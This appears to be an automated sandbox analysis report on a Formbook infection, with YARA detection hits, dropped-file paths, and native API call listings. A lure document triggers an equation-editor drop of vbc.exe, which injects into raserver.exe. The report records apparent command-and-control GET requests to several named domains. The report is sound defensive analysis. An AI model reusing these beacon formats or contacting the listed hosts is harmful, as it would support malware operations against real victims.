        Source: global trafficHTTP traffic detected: GET /r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.aubergetoitrouge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.corpmat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.afishin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.boxtobookshelf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

        E-Banking Fraud:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
        Source: Screenshot number: 8Screenshot OCR: Enable Editing from the 18 , yellow bar above 19 This document is 20 3 Once you have enabled ed
        Office equation editor drops PE fileShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        .NET source code contains very large stringsShow sources
        Source: vbc[1].exe.4.dr, Forms/mainForm.csLong String: Length: 38272
        Source: vbc.exe.4.dr, Forms/mainForm.csLong String: Length: 38272
        Source: 6.2.vbc.exe.330000.1.unpack, Forms/mainForm.csLong String: Length: 38272
        Source: 6.0.vbc.exe.330000.0.unpack, Forms/mainForm.csLong String: Length: 38272
        Source: 7.0.vbc.exe.330000.0.unpack, Forms/mainForm.csLong String: Length: 38272
        Source: 7.2.vbc.exe.330000.1.unpack, Forms/mainForm.csLong String: Length: 38272
        Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D009C
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D1121
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D1B00
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D3BF8
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D4488
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D5D50
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D4EB1
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D1700
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D8000
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D30D1
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001DC210
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D8290
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D8280
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D82CB
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D3B68
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D13B0
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D6BD0
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D6BC0
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001DAC12
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D5C60
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D8498
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D04EA
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D4CE0
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D7D98
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D7DA8
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D9E51
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001DA749
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00401026
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00401030
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041C2AE
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00408C50
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041BD71
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D88
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D90
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B691
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041C754
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00402FB0
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4E0C6
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A7D005
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A53040
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A6905A
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4E2E9
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00AF1238
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4F3CF
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A763DB
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A52305
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A9A37B
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A57353
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A85485
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A61489
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A8D47D
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A6C5F0
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5351F
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A54680
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5E6C1
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00AF2622
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5C7BC
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00AD579A
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A857C3
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00AEF8EE
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A7286D
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5C85C
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A529B2
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00AF098E
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A669FE
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00AD5955
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00B03A83
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00AFCBA4
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4FBD7
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00ADDBDA
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A77B00
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00AEFDDD
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A80D3B
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5CD5B
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A82E2F
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A6EE4C
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A60F3F
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EEE0C6
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F0905A
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EF3040
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F1D005
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EEF3CF
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F163DB
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F3A37B
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EF7353
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EF2305
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EEE2E9
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F91238
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F0C5F0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EF351F
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F25485
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F01489
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EFC7BC
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F7579A
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EFE6C1
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EF4680
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F92622
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F069FE
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EF29B2
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F9098E
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F75955
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F8F8EE
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F1286D
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EFC85C
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F7DBDA
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EEFBD7
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F9CBA4
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F17B00
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01FA3A83
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F8FDDD
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EFCD5B
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F20D3B
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F1DF7C
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F00F3F
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01F0EE4C
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00088C50
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00082D88
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00082D90
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0009C754
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00082FB0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022667C7
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022632FF
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_02263302
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_02261362
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_02265062
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022608F9
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_02260902
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022675B2
        Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01EEDF5C appears 101 times
        Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F33F92 appears 99 times
        Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01EEE2A8 appears 38 times
        Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F3373B appears 237 times
        Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F5F970 appears 77 times
        Source: C:\Users\Public\vbc.exeCode function: String function: 00A4DF5C appears 104 times
        Source: C:\Users\Public\vbc.exeCode function: String function: 00A9373B appears 238 times
        Source: C:\Users\Public\vbc.exeCode function: String function: 00A93F92 appears 108 times
        Source: C:\Users\Public\vbc.exeCode function: String function: 00ABF970 appears 79 times
        Source: C:\Users\Public\vbc.exeCode function: String function: 00A4E2A8 appears 37 times
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004181B0 NtCreateFile,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00418260 NtReadFile,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004182E0 NtClose,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00418390 NtAllocateVirtualMemory,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004181B4 NtCreateFile,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041825B NtReadFile,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004182DA NtClose,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A400C4 NtCreateFile,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A40078 NtResumeThread,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A40048 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A407AC NtCreateMutant,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3F9F0 NtClose,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3F900 NtReadFile,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FAE8 NtQueryInformationProcess,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FBB8 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FB68 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FC90 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FC60 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FD8C NtDelayExecution,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FDC0 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FEA0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FFB4 NtCreateSection,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A410D0 NtOpenProcessToken,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A40060 NtQuerySection,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A401D4 NtSetValueKey,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4010C NtOpenDirectoryObject,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A41148 NtOpenThread,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3F8CC NtWaitForSingleObject,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A41930 NtSetContextThread,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3F938 NtWriteFile,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FAB8 NtQueryValueKey,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FA20 NtQueryInformationFile,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FA50 NtEnumerateValueKey,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FBE8 NtQueryVirtualMemory,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FB50 NtCreateKey,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FC30 NtOpenProcess,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A40C40 NtGetContextThread,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FC48 NtSetInformationFile,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A41D80 NtSuspendThread,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FD5C NtEnumerateKey,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FE24 NtWriteVirtualMemory,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FFFC NtCreateProcessEx,
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FF34 NtQueueApcThread,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE00C4 NtCreateFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE07AC NtCreateMutant,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDF9F0 NtClose,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDF900 NtReadFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFBB8 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFB68 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFB50 NtCreateKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFAE8 NtQueryInformationProcess,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFAB8 NtQueryValueKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFDC0 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFD8C NtDelayExecution,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFC60 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFFB4 NtCreateSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE01D4 NtSetValueKey,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE1148 NtOpenThread,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE010C NtOpenDirectoryObject,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE10D0 NtOpenProcessToken,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE0060 NtQuerySection,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE0078 NtResumeThread,
